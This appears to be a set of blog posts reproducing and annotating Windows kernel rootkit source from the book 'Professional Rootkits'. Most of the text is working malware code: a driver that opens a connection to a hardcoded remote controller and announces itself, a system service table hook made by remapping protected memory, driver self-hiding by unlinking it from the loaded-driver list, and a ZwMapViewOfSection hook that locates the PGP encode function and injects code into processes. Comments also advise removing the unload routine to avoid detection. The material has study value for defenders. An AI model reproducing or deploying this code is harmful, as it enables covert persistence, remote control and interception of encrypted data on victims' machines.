	if( KeSetTimerEx( pKernelTimer, timeout, 500, pKernelDPC ) )
	{
		DbgPrint("comint32: OpenTDIConnection() Timer was already set.");
	}

	return STATUS_SUCCESS;
}

// Clean up: cancel the timer and free each allocation once
void CloseTDIConnection()
{
	if( pKernelTimer != NULL )
	{
		KeCancelTimer( pKernelTimer );
		ExFreePool( pKernelTimer );
		pKernelTimer = NULL;
	}
	if( pKernelDPC != NULL )
	{
		ExFreePool( pKernelDPC );
		pKernelDPC = NULL;
	}
	if( pFileInfo != NULL )
		ExFreePool( pFileInfo );
	if( pSendBuffer != NULL )
		ExFreePool( pSendBuffer );
	if( pSendMdl != NULL )
		IoFreeMdl( pSendMdl );
	if( pReceiveMdl != NULL )
		IoFreeMdl( pReceiveMdl );
}

NTSTATUS SendToRemoteController( char* buffer )
{
	NTSTATUS status;
	ULONG bufferLength;
	KEVENT SendEvent;
	PIRP pIrp;
	IO_STATUS_BLOCK IoStatusBlock;

	KeInitializeEvent( &SendEvent, NotificationEvent, FALSE );

	bufferLength = strlen( buffer );
	if( pSendBuffer != NULL ) // global
		ExFreePool( pSendBuffer );
	pSendBuffer = ExAllocatePool( NonPagedPool, bufferLength );
	if( pSendBuffer == NULL )
		return( STATUS_INSUFFICIENT_RESOURCES );
	memcpy( pSendBuffer, buffer, bufferLength );

	// build an IO Request Packet
	pIrp = TdiBuildInternalDeviceControlIrp( TDI_SEND,
		pDeviceObject,
		pFileObject, // global, set by OpenTDIConnection
		&SendEvent,
		&IoStatusBlock );
	if( pIrp == NULL )
	{
		DbgPrint( "comint32: SendToRemoteController() could not get an IRP for TDI_SEND" );
		return( STATUS_INSUFFICIENT_RESOURCES );
	}

	if( pSendMdl != NULL ) // global
		IoFreeMdl( pSendMdl );
	pSendMdl = IoAllocateMdl( pSendBuffer, bufferLength, FALSE, FALSE, pIrp );
	if( pSendMdl == NULL )
	{
		DbgPrint("comint32: SendToRemoteController() could not get an MDL for TDI_SEND");
		return( STATUS_INSUFFICIENT_RESOURCES );
	}

	__try
	{
		MmProbeAndLockPages( pSendMdl, KernelMode, IoModifyAccess );
	}
	__except( EXCEPTION_EXECUTE_HANDLER )
	{
		DbgPrint("comint32: SendToRemoteController() ProbeAndLock exception.");
		return( STATUS_UNSUCCESSFUL );
	}

	// Extend the packet
	TdiBuildSend( pIrp,
		pDeviceObject,
		pFileObject,
		NULL,
		NULL,
		pSendMdl,
		0,
		bufferLength );

	// set completion routine
	IoSetCompletionRoutine( pIrp, TDICompletionRoutine, &SendEvent, TRUE, TRUE, TRUE);

	// Send the packet
	status = IoCallDriver( pDeviceObject, pIrp );

	// wait
	if( status == STATUS_PENDING )
	{
		DbgPrint("comint32: SendToRemoteController() waiting on IRP (send)...");
		KeWaitForSingleObject( &SendEvent, Executive, KernelMode, FALSE, 0 );
	}
	if( ( status != STATUS_SUCCESS ) &&
		( status != STATUS_PENDING ) )
	{
		DbgPrint("comint32: SendToRemoteController() Send failed. Status = %0x", status);
		return( STATUS_UNSUCCESSFUL );
	}

	return STATUS_SUCCESS;
}

// called periodically
VOID timerDPC( PKDPC Dpc, PVOID DeferredContext, PVOID sys1, PVOID sys2 )
{
	// poll for commands
}

 

 

// Copyright Ric Vieler, 2004
//ConfigManager.h
//c network programming
#ifndef _CONFIG_MANAGER_H_
#define _CONFIG_MANAGER_H_

char masterPort[10];
char masterAddress1[4];
char masterAddress2[4];
char masterAddress3[4];
char masterAddress4[4];

NTSTATUS Configure();

#endif

 

// Copyright Ric Vieler, 2004
// driver.h

#ifndef _GHOST_H_
#define _GHOST_H_

#define _GHOST_ROOTKIT_

typedef unsigned long	DWORD;
typedef int				BOOL;
typedef unsigned char	BYTE;
typedef unsigned short	WORD;
typedef float			FLOAT;
typedef FLOAT*			PFLOAT;
typedef BOOL*			PBOOL;
typedef BYTE*			PBYTE;
typedef int*			PINT;
typedef WORD*			PWORD;
typedef DWORD*			PDWORD;
typedef DWORD*			LPDWORD;
typedef int				INT;
typedef unsigned int	UINT;
typedef unsigned int*	PUINT;
typedef long*			LPLONG;

typedef void*			PVOID;
#define LPVOID			PVOID
typedef PVOID			FARPROC;
typedef const void*		LPCVOID;

typedef struct _SECURITY_ATTRIBUTES
{
    DWORD nLength;
    LPVOID lpSecurityDescriptor;
    BOOL bInheritHandle;
} SECURITY_ATTRIBUTES, *PSECURITY_ATTRIBUTES, *LPSECURITY_ATTRIBUTES;

typedef struct _OVERLAPPED
{
    DWORD   Internal;
    DWORD   InternalHigh;
    DWORD   Offset;
    DWORD   OffsetHigh;
    HANDLE  hEvent;
} OVERLAPPED, *LPOVERLAPPED;

typedef struct _DRIVER_DATA
{
   LIST_ENTRY listEntry;
   DWORD  unknown1;
   DWORD  unknown2;
   DWORD  unknown3;
   DWORD  unknown4;
   DWORD  unknown5;
   DWORD  unknown6;
   DWORD  unknown7;
   UNICODE_STRING path;
   UNICODE_STRING name;
} DRIVER_DATA;

#define CREATE_NEW          1
#define CREATE_ALWAYS       2
#define OPEN_EXISTING       3
#define OPEN_ALWAYS         4
#define TRUNCATE_EXISTING   5

#define INVALID_HANDLE_VALUE  ((HANDLE)((LONG_PTR)-1))

#endif

 

The files above are used by the driver entry function:

// driver.c
// Copyright Ric Vieler, 2006
//c network programming
#include "ntddk.h"
#include "driver.h"
#include "configManager.h"
#include "commManager.h"

// Global version data
ULONG majorVersion;
ULONG minorVersion;


VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )
{
    UNICODE_STRING deviceLink = { 0 };

	// Close the connection to remote controller
	CloseTDIConnection();

}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING theRegistryPath )
{
	DRIVER_DATA* driverData;
    UNICODE_STRING deviceName = { 0 };
    UNICODE_STRING deviceLink = { 0 };
	PDEVICE_OBJECT pDeviceController;

	// Get the operating system version
	PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

	// Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95
	// Major = 5: Windows Server 2003, Windows XP or Windows 2000
	// Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95
	// Minor = 1: Windows XP
	// Minor = 2: Windows Server 2003

	if ( majorVersion == 5 && minorVersion == 2 )
	{
		DbgPrint("comint32: Running on Windows 2003");
	}
	else if ( majorVersion == 5 && minorVersion == 1 )
	{
		DbgPrint("comint32: Running on Windows XP");
	}
	else if ( majorVersion == 5 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows 2000");
	}
	else if ( majorVersion == 4 && minorVersion == 0 )
	{
		DbgPrint("comint32: Running on Windows NT 4.0");
	}
	else
	{
		DbgPrint("comint32: Running on unknown system");
	}


	// Get the remote controller's address and port
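	// the config variables are char arrays, so the strings are copied into them
	strcpy( masterPort, "01234" );
	strcpy( masterAddress1, "192" );
	strcpy( masterAddress2, "168" );
	strcpy( masterAddress3, "20" );
	strcpy( masterAddress4, "16" );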

	// Open the connection to remote controller
	if( !NT_SUCCESS( OpenTDIConnection() ) )
	{
		DbgPrint("comint32: Could not open remote connection.\n");		
		return STATUS_UNSUCCESSFUL;
	}

	// Tell remote controller that we're here
	SendToRemoteController( "207.26.40.60" ); 
	
	pDriverObject->DriverUnload = OnUnload; 
	
	return STATUS_SUCCESS;
}
Published in Network Programming
Saturday, 30 May 2015 00:00

Kernel hooks | Kernel Hacking


An OS's API functionality can be modified through kernel hooks. Many rootkits install kernel hooks to disrupt the monitoring mechanisms of the OS and to conceal themselves. System calls are registered in the operating system's service table, so when an application calls an API, the OS first looks the call up in this table, then locates the routine and invokes it. In theory, placing a kernel hook is as easy as putting an address of your choice in this table, but the table is write-protected and you cannot modify it directly. Therefore the real challenge in the rootkit source code is making this table writable.

As you may know, the OS accesses memory through pages. A page covers a range of virtual addresses and maps it to physical memory. Each page has a set of flags, and write permission is one of them. To make the system service table writable we do not go through the pages, and the access, that the OS provides for the table; instead we map the physical memory behind the system service table to a second virtual address whose flags we define ourselves.

The Service Descriptor Table is exported by the kernel (ntoskrnl.exe) as KeServiceDescriptorTable and can be imported into the driver:

#pragma pack(1)

typedef struct ServiceDescriptorEntry

{

 unsigned int *ServiceTableBase;

 unsigned int *ServiceCounterTableBase;

 unsigned int NumberOfServices;

  unsigned char *ParamTableBase;

} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;

#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;

 

Instead of writing to the table through this variable (its pages are not writable), we create a second mapping of the same memory:

pMyMDL = MmCreateMdl(NULL,

  KeServiceDescriptorTable.ServiceTableBase,

  KeServiceDescriptorTable.NumberOfServices * 4 );


 if( !pMyMDL )

  return( STATUS_UNSUCCESSFUL );

 
 MmBuildMdlForNonPagedPool( pMyMDL );

 pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;

 NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode );
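
The effect of the second mapping can be imitated in user mode as an analogy. In the sketch below one backing object is mapped twice with POSIX mmap, once read-only and once writable, so a write through the writable view becomes visible through the read-only one. This is not the kernel MDL mechanism itself; the dual_view type and its functions are hypothetical names, and the code assumes a POSIX system.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <assert.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/* Two views of the same memory, each with its own page permissions. */
typedef struct dual_view {
    const unsigned int *ro;  /* read-only view, standing in for the protected table */
    unsigned int *rw;        /* writable alias, standing in for NewSystemCallTable */
    size_t bytes;
    FILE *backing;           /* temporary file that backs both views */
} dual_view;

/* Maps `entries` table slots twice; returns 0 on success, -1 on failure. */
static int dual_view_open(dual_view *v, size_t entries) {
    void *ro, *rw;
    int fd;
    v->bytes = entries * sizeof(unsigned int);
    v->backing = tmpfile();
    if (v->backing == NULL) return -1;
    fd = fileno(v->backing);
    if (ftruncate(fd, (off_t)v->bytes) != 0) { fclose(v->backing); return -1; }
    ro = mmap(NULL, v->bytes, PROT_READ, MAP_SHARED, fd, 0);
    rw = mmap(NULL, v->bytes, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (ro == MAP_FAILED || rw == MAP_FAILED) {
        if (ro != MAP_FAILED) munmap(ro, v->bytes);
        if (rw != MAP_FAILED) munmap(rw, v->bytes);
        fclose(v->backing);
        return -1;
    }
    v->ro = ro;
    v->rw = rw;
    return 0;
}

/* Unmaps both views and releases the backing file. */
static void dual_view_close(dual_view *v) {
    munmap((void *)v->ro, v->bytes);
    munmap(v->rw, v->bytes);
    fclose(v->backing);
}
```

A write through v.ro would fault, just as a write through the original table address does, while v.rw reaches the same bytes without touching the protection of the first view.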

 

After mapping the system service table to a writable virtual address, we locate the entry of the API to be hooked in the writable table and simply change it to point to our code. The entry is found through the function's index in the table, which HOOK_INDEX reads from the bytes that follow the first opcode byte of the Zw function. We keep a reference to the original API (ZwMapViewOfSection) so that our replacement can call it and so that the hook can be removed later.

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1)

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection );
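
The two macros can be modelled in user mode with a mock table. The sketch below assumes a stub that starts with opcode 0xB8 (mov eax, imm32) followed by the service index, decodes the index the way HOOK_INDEX does, and swaps a table entry while keeping the old pointer. All names (service_table, stub_for_b, hook_index, hook) are hypothetical, and the swap is a plain assignment rather than the InterlockedExchange used in the driver.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int (*service_fn)(int);

/* Mock services and the table that dispatches to them. */
static int svc_a(int x) { return x + 1; }
static int svc_b(int x) { return x * 2; }
static int svc_c(int x) { return x - 3; }
static service_fn service_table[3] = { svc_a, svc_b, svc_c };

/* Mock Zw-style stub: 0xB8 then the 32-bit index in little-endian order. */
static const unsigned char stub_for_b[5] = { 0xB8, 0x01, 0x00, 0x00, 0x00 };

/* Same idea as HOOK_INDEX: skip the opcode byte and read the 32-bit operand. */
static uint32_t hook_index(const unsigned char *stub) {
    return (uint32_t)stub[1] | ((uint32_t)stub[2] << 8) |
           ((uint32_t)stub[3] << 16) | ((uint32_t)stub[4] << 24);
}

/* Same idea as HOOK/UNHOOK: install a pointer and hand back the previous one. */
static service_fn hook(uint32_t index, service_fn replacement) {
    service_fn old;
    if (index >= sizeof service_table / sizeof service_table[0]) return NULL;
    old = service_table[index];
    service_table[index] = replacement;
    return old;
}

/* Replacement service: calls the saved original, then alters the result. */
static service_fn original_b;
static int hooked_b(int x) { return original_b(x) + 100; }
```

Calling hook a second time with the saved pointer restores the table, which is what the UNHOOK macro in the header below does.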

 

Below is the complete code to hook ZwMapViewOfSection. Please note that this code can only be compiled with the DDK (Driver Development Kit), and the output is a driver that needs to be loaded.

//hookManager.h

#ifndef _HOOK_MANAGER_H_

#define _HOOK_MANAGER_H_

 

// The kernel's Service Descriptor Table

#pragma pack(1) //pack the structure members on 1-byte boundaries so the compiler inserts no padding and the layout matches the kernel's structure exactly

typedef struct ServiceDescriptorEntry // typedef makes our job easier because we do not need the struct keyword when declaring a variable of this type

{

 unsigned int *ServiceTableBase;

 unsigned int *ServiceCounterTableBase;

 unsigned int NumberOfServices;

  unsigned char *ParamTableBase;

} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t; // here we define the actual type "ServiceDescriptorTableEntry_t" and its pointer type "PServiceDescriptorTableEntry_t"

#pragma pack()

__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable; //__declspec(dllimport) imports the KeServiceDescriptorTable variable exported by the kernel (ntoskrnl.exe); its type is ServiceDescriptorTableEntry_t

 

// Our System Call Table

extern PVOID* NewSystemCallTable; //extern because the global itself is defined in one of the .c files

 

// Our Memory Descriptor List

extern PMDL pMyMDL; //extern because the global itself is defined in one of the .c files

 

#define HOOK_INDEX(function2hook) *(PULONG)((PUCHAR)function2hook+1) // read the system call index stored right after the first opcode byte of function2hook

 

#define HOOK(functionName, newPointer2Function, oldPointer2Function )  oldPointer2Function = (PVOID) InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) newPointer2Function)

 

#define UNHOOK(functionName, oldPointer2Function)  \

 InterlockedExchange( (PLONG) &NewSystemCallTable[HOOK_INDEX(functionName)], (LONG) \

oldPointer2Function)

 

typedef NTSTATUS (*ZWMAPVIEWOFSECTION)( //defining this pointer type for casting return value of InterlockedExchange

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

 IN ULONG Protect );

 

extern ZWMAPVIEWOFSECTION OldZwMapViewOfSection; //This variable keeps the address of the old ZwMapViewOfSection function; we need it to call the original from the replacement function

 

NTSTATUS NewZwMapViewOfSection(

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

  IN ULONG Protect );

 

NTSTATUS Hook();

 

#endif

 

The file above is the header for the file below; together they define the functions that hook the kernel. The Hook() function, which uses the HOOK macro, is called by the driver code shown afterwards.

//hookManager.c

#include "ntddk.h"

#include "hookManager.h"

#include "Ghost.h"

 

NTSTATUS NewZwMapViewOfSection( // definition of function to replace the hooked function

 IN HANDLE SectionHandle,

 IN HANDLE ProcessHandle,

 IN OUT PVOID *BaseAddress,

 IN ULONG ZeroBits,

 IN ULONG CommitSize,

 IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

 IN OUT PSIZE_T ViewSize,

 IN SECTION_INHERIT InheritDisposition,

 IN ULONG AllocationType,

 IN ULONG Protect )

{

 NTSTATUS status;

 

 DbgPrint("comint32: NewZwMapViewOfSection called.");

 // we can do whatever we want with the input here

 // and return or continue to the original function

 

 status = OldZwMapViewOfSection(       SectionHandle, // the original function, whose address was saved by the HOOK macro; we cannot call it by its original name because that table entry now points to the function above

  ProcessHandle,

  BaseAddress,

  ZeroBits,

  CommitSize,

  SectionOffset OPTIONAL,

  ViewSize,

  InheritDisposition,

  AllocationType,

  Protect );

 

 // we can do whatever we want with the output here

 // and return any value including the actual one

 

 return status;

}

 

NTSTATUS Hook( )

{

 // Needed for HOOK_INDEX

 //RtlInitUnicodeString(&dllName, L"\\SystemRoot\\system32\\ntdll.dll");

 

 pMyMDL = MmCreateMdl(NULL, // MmCreateMdl builds a Memory Descriptor List (MDL) for a range of virtual memory; here it describes the system call table so that we can get a second, UNPROTECTED mapping of it (the original mapping is write-protected)

  KeServiceDescriptorTable.ServiceTableBase, // KeServiceDescriptorTable is where the kernel keeps the table of pointers to its system service routines; we can use it because hookManager.h imports it from the kernel

  KeServiceDescriptorTable.NumberOfServices * 4 );

 

 if( !pMyMDL )

  return( STATUS_UNSUCCESSFUL );

 

 MmBuildMdlForNonPagedPool( pMyMDL ); // fill in the MDL (pMyMDL) with the physical pages that back the table; the table lives in nonpaged memory

 pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; // Important! We can change the flags because we created the MDL ourselves and it is not write-protected. Setting MDL_MAPPED_TO_SYSTEM_VA lets us lock the pages and write to kernel memory

 NewSystemCallTable = MmMapLockedPages( pMyMDL, KernelMode ); // returns the base address of a new mapping of the system call table that can be modified and is not PROTECTED; because the pages are locked they cannot be paged out

 

 if( !NewSystemCallTable )

  return( STATUS_UNSUCCESSFUL );

 

 // Add hooks here (remember to unhook if using DriverUnload)

 

 HOOK( ZwMapViewOfSection, NewZwMapViewOfSection, OldZwMapViewOfSection ); // the macro is explained in hookManager.h. Mind the prefixes: ZwMapViewOfSection is the function to be hooked, NewZwMapViewOfSection replaces it, and OldZwMapViewOfSection is the pointer we defined to receive the original address

 

 return( STATUS_SUCCESS );

}

 

Here is the driver code that hooks the kernel API:

//Rootkit.c

#include "ntddk.h"

#include "Ghost.h"

#include "fileManager.h"

#include "configManager.h"

#include "hookManager.h"

 

// Used to circumvent memory protected System Call Table

PVOID* NewSystemCallTable = NULL;

PMDL pMyMDL = NULL;

// Pointer(s) to original function(s)

ZWMAPVIEWOFSECTION OldZwMapViewOfSection;

 

// Global version data

ULONG majorVersion;

ULONG minorVersion;

 

 // Comment out in free build to avoid detection

VOID OnUnload( IN PDRIVER_OBJECT pDriverObject )

{

 DbgPrint("comint32: OnUnload called.");

 

 // Unhook any hooked functions and return the Memory Descriptor List

 if( NewSystemCallTable ) // if this variable is non-NULL, the kernel hook has been installed

 {

  UNHOOK( ZwMapViewOfSection, OldZwMapViewOfSection ); // disable the hook: the original function pointer goes back to its place in the table

  MmUnmapLockedPages( NewSystemCallTable, pMyMDL ); // remove the mapping we created to write to the protected area

  IoFreeMdl( pMyMDL ); // release the MDL itself so the OS can reuse its memory

 }

 

}

 

 

NTSTATUS DriverEntry( IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING

theRegistryPath )

{

DRIVER_DATA* driverData;

 

 // Get the operating system version

 PsGetVersion( &majorVersion, &minorVersion, NULL, NULL );

 

 // Major = 4: Windows NT 4.0, Windows Me, Windows 98 or Windows 95

 // Major = 5: Windows Server 2003, Windows XP or Windows 2000

 // Minor = 0: Windows 2000, Windows NT 4.0 or Windows 95

 // Minor = 1: Windows XP

 // Minor = 2: Windows Server 2003

 

 if ( majorVersion == 5 && minorVersion == 2 )

 {

 

  DbgPrint("comint32: Running on Windows 2003");

 }

 else if ( majorVersion == 5 && minorVersion == 1 )

 {

 

  DbgPrint("comint32: Running on Windows XP");

 }

 else if ( majorVersion == 5 && minorVersion == 0 )

 {

 

  DbgPrint("comint32: Running on Windows 2000");

 }

 else if ( majorVersion == 4 && minorVersion == 0 )

 {

 

  DbgPrint("comint32: Running on Windows NT 4.0");

 }

 else

 {

 

  DbgPrint("comint32: Running on unknown system");

 }

 

 // Hide this driver

 driverData = *((DRIVER_DATA**)((DWORD)pDriverObject + 20));

 if( driverData != NULL )

 {

  // unlink this driver entry from the driver list

  *((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink;

  driverData->listEntry.Flink->Blink = driverData->listEntry.Blink;

 }

 

// Comment out in free build to avoid detection

 pDriverObject->DriverUnload = OnUnload;

 

 // Configure the controller connection

 if( !NT_SUCCESS( Configure() ) )

 {

  DbgPrint("comint32: Could not configure remote connection.\n");

  return STATUS_UNSUCCESSFUL;

 }

 

 // Hook the System Call Table

 if( !NT_SUCCESS( Hook() ) ) // defined in hookManager.c

 {

  DbgPrint("comint32: Could not hook the System Call Table.\n");

  return STATUS_UNSUCCESSFUL;

 }

 

 return STATUS_SUCCESS;

}

 

All of the rootkit source code above is from "Professional Rootkits" by Ric Vieler. I have added comments and made minor changes so that it compiles with the DDK and Visual Studio I had (on Windows XP). You can download the full rootkit source code and a compiled version from here.

 

Published in Rootkit development

Usage of API hooking for code injection 

One method of code injection relies on API hooking. In this approach a kernel API such as ZwMapViewOfSection (which is called when a DLL is mapped into a process) is hooked first, and from inside the replacement function we can then hook functions of the dynamic link library being loaded. Hooking ZwMapViewOfSection tells us when a DLL needed by a process is being mapped, which is the moment to start the code injection: we overwrite the start of the original function so that our code runs before or after the hooked function.

Code injection algorithm

Our methodology is simple, although it is full of details. The algorithm is:

  • Let the dynamic link library be mapped into the memory of the user process
  • Find the address of the function to hook in the memory of the user process
  • Allocate space in the memory of the user process
  • Write our function (the one that will replace the hooked function) and any other data it needs to this space
  • Find the first instruction of the hooked function
  • Replace it with a jump to our function
  • Copy that first instruction, followed by a jump back into the hooked function, into our hooking function

The picture below shows the concept:

User Mode hooks | before and after code injection

                       Figure 4-2(from Professional rootkits book)

You need a solid background in operating systems and the x86 platform to understand some of the logic behind API hooking. For example, we need to allocate some space in the process that is asking for the hooked function (the process into which the DLL is being mapped), because a jump to code that lies outside the process's own memory is not allowed and the memory the process already owns is in use. Thus we allocate new memory there, into which we can copy the code that replaces the hooked function.

The trampoline is the beginning of our hook. The first instruction of the hooked function is its entry point, and that is what we overwrite. But what happens to this instruction? We copy it to the allocated memory, and when we want to pass control to the hooked function we execute the copy before jumping back.

Design concerns for api hooking and Code injection

Before jumping to the code, ask yourself these questions and look for the answers in the source code below.

How do we locate a dynamic library function?

The name of a function becomes an address once the code is compiled, so how can we search for a name in a block of opcodes in memory?

The hooked function has some parameters and to run our custom code we may need the parameters, how can we access them?

What do we need to inject to change the execution control to our injected code or trampoline function?

How can we find the address of our injected code or trampoline function so that we can use it as the target of the jump?

Pay careful attention to the difference between the address of a piece of code in our example rootkit and its address in the calling process. For example, we write the new hooking function in the rootkit and then place a copy of it in the running process. The code as written in the rootkit is therefore never meant to run in place; only its copy runs.

How do we know what the first instruction of the hooked function is?

How can we handle changing execution control flow to the POST-Hook (after running the original hooked function)?

What should the POST-HOOK do so the calling process of the hooked function does not detect any issues?

What can we do in our custom injected hook code?

 

Api hooking

We start from the hooked kernel function ZwMapViewOfSection (refer to the kernel hooks post to see how the hook is installed). All of the code is from the book "Professional Rootkits" by Ric Vieler, but I have commented it heavily and tried to explain the vague lines.

// Process Inject Dynamic Link Libraries

NTSTATUS NewZwMapViewOfSection(

    IN HANDLE SectionHandle,

    IN HANDLE ProcessHandle,

    IN OUT PVOID *BaseAddress,

    IN ULONG ZeroBits,

    IN ULONG CommitSize,

    IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,

    IN OUT PSIZE_T ViewSize,

    IN SECTION_INHERIT InheritDisposition,

    IN ULONG AllocationType,

    IN ULONG Protect )

{

            NTSTATUS status;

 

            // First complete the standard mapping process

            status = OldZwMapViewOfSection(    SectionHandle, // For what a section is, refer to https://msdn.microsoft.com/en-us/library/windows/hardware/ff563684(v=vs.85).aspx . Briefly, a section object is a region of memory that can be shared (for example, a driver can use one to share memory with the calling process)

                                                            ProcessHandle,

                                                            BaseAddress,

                                                            ZeroBits,

                                                            CommitSize,

                                                            SectionOffset OPTIONAL,

                                                            ViewSize,

                                                            InheritDisposition,

                                                            AllocationType,

                                                            Protect );

 

            // Now remap as required ( imageOffset only known for versions 4 & 5 )

            if( NT_SUCCESS( status ) && ( majorVersion == 4 || majorVersion == 5 ) )

            {

                        unsigned int     imageOffset = 0;

                        VOID*                         pSection = NULL;

                        unsigned int     imageSection = FALSE;

                        HANDLE                                 hRoot = NULL;

                        PUNICODE_STRING objectName = NULL;

                        PVOID                         pImageBase = NULL;

                        UNICODE_STRING    library1 = { 0 };

                        UNICODE_STRING    library2 = { 0 };

                        CALL_DATA_STRUCT          callData[TOTAL_HOOKS] = { 0 };

                        int                                                        hooks2inject = 0;

                       

                        // Image location higher in version 4

                        if( majorVersion == 4 )

                                    imageOffset = 24;

 

                        if( ObReferenceObjectByHandle(       SectionHandle, // this function normally validates access to the object behind a handle; here it also makes sure the object is not released while we use it and gives us a pointer to the section. Here is a list of object handles: https://msdn.microsoft.com/en-us/library/windows/hardware/ff557758(v=vs.85).aspx

                                                                                                                        SECTION_MAP_EXECUTE,

                                                                                                                        *MmSectionObjectType, // I searched hard but could not find the structure behind MmSectionObjectType documented anywhere

                                                                                                                        KernelMode,

                                                                                                                        &pSection,

                                                                                                                        NULL ) == STATUS_SUCCESS )

                        {

                                    // Check to see if this is an image section

                                    // If it is, get the root handle and the object name

                                    _asm

                                    {

                                                mov     edx, pSection

                                                mov     eax, [edx+14h] // fetch the pointer stored at pSection + 20; call it image_base

                                                add     eax, imageOffset // add imageOffset to image_base (24 on version 4, 0 on version 5)

                                                mov     edx, [eax] // fetch image = [image_base + imageOffset]

                                                test    byte ptr [edx+20h], 20h // AND the byte at image + 32 with 00100000b

                                                jz      not_image_section // if the 6th bit of that byte is not 1, this is not an image section

                                                mov     imageSection, TRUE

                                                mov     eax, [edx+24h] // fetch the pointer at image + 36 (possibly the 9th field)

                                                mov     edx, [eax+4] // module handle

                                                mov     hRoot, edx

                                                add     eax, 30h // the object name sits 48 bytes into the structure that the pointer refers to

                                                mov     objectName, eax

                                                not_image_section:

 

                                    }

                                    if( BaseAddress )

                                                pImageBase = *BaseAddress;

 

                                    // Mapping a DLL

                                    if( imageSection && pImageBase && objectName && objectName->Length > 0 )

                                    {

                                                // define libraries of interest

                                                RtlInitUnicodeString( &library1, L"kernel32.dll" ); //just copy the string as unicode

                                                RtlInitUnicodeString( &library2, L"PGPsdk.dll" );

 

                                                if ( IsSameFile( &library1, objectName ) ) // kernel32; note that objectName contains the full path

                                                {

                                                            kernel32Base = pImageBase;

                                                }

                                                else if ( IsSameFile( &library2, objectName ) ) // PGPsdk

                                                {

                                                            // Pattern for PGP 9.0 Encode

                                                            BYTE pattern1[] = {    0x55, 0x8B, 0xEC, 0x83, 0xE4, 0xF8, 0x81, 0xEC, \

                                                                                                                        0xFC, 0x00, 0x00, 0x00, 0x53, 0x33, 0xC0, 0x56, \

                                                                                                                        0x57, 0xB9, 0x26, 0x00, 0x00, 0x00, 0x8D, 0x7C, \

                                                                                                                        0x24, 0x18, 0xF3, 0xAB };

 

                                                            PVOID pfEncode = GetFunctionAddress( pImageBase, NULL, pattern1, sizeof(pattern1) ); // scans the whole image starting at pImageBase for the opcodes in pattern1[]

 

                                                            if( !pfEncode )

                                                            {

                                                            // Pattern for PGP 9.5 Encode

                                                                        BYTE pattern2[] = {    0x81, 0xEC, 0xFC, 0x00, 0x00, 0x00, 0x53, 0x55, \

                                                                                                                                    0x33, 0xDB, 0x68, 0x98, 0x00, 0x00, 0x00, 0x8D, \

                                                                                                                                    0x44, 0x24, 0x14, 0x53, 0x50, 0x89, 0x9C, 0x24, \

                                                                                                                                    0xB4, 0x00, 0x00, 0x00 };

 

                                                                        pfEncode = GetFunctionAddress( pImageBase, NULL, pattern2, sizeof(pattern2) );

                                                            }

 

                                                            if( pfEncode )

                                                            {

                                                                        hooks2inject = 1; // just one hook for now, but we can add as many hooks as we want by filling in more callData array elements

                                                                        callData[0].index = USERHOOK_beforeEncode;

                                                                        callData[0].hookFunction = pfEncode;

                                                                        callData[0].parameters = 2;

                                                                        callData[0].callType = CDECL_TYPE;

                                                                        callData[0].stackOffset = 0;

                                                                        DbgPrint("comint32: NewZwMapViewOfSection pfEncode = %x",pfEncode);

                                                            }

                                                            else

                                                            {

                                                                        DbgPrint("comint32:  PGP Encode not found.");

                                                            }

                                                }

                                                if( hooks2inject > 0 ) // only if we found a function to hook; for now that is just the Encode function

                                                {

                                                            PCHAR injectedMemory;

 

                                                            // prepare memory

                                                            injectedMemory = allocateUserMemory(); // allocate memory in process area

                                                            // inject

                                                            if( !processInject( (CALL_DATA_STRUCT*)&callData, hooks2inject, injectedMemory ) ) // copy code and data to injectedMemory and place hooks in function

                                                            {

                                                                        DbgPrint("comint32: processInject failed!\n" );

                                                            }

                                                }

                                    }

                                    ObDereferenceObject( pSection );

                        }

            }

            return status;

}

 

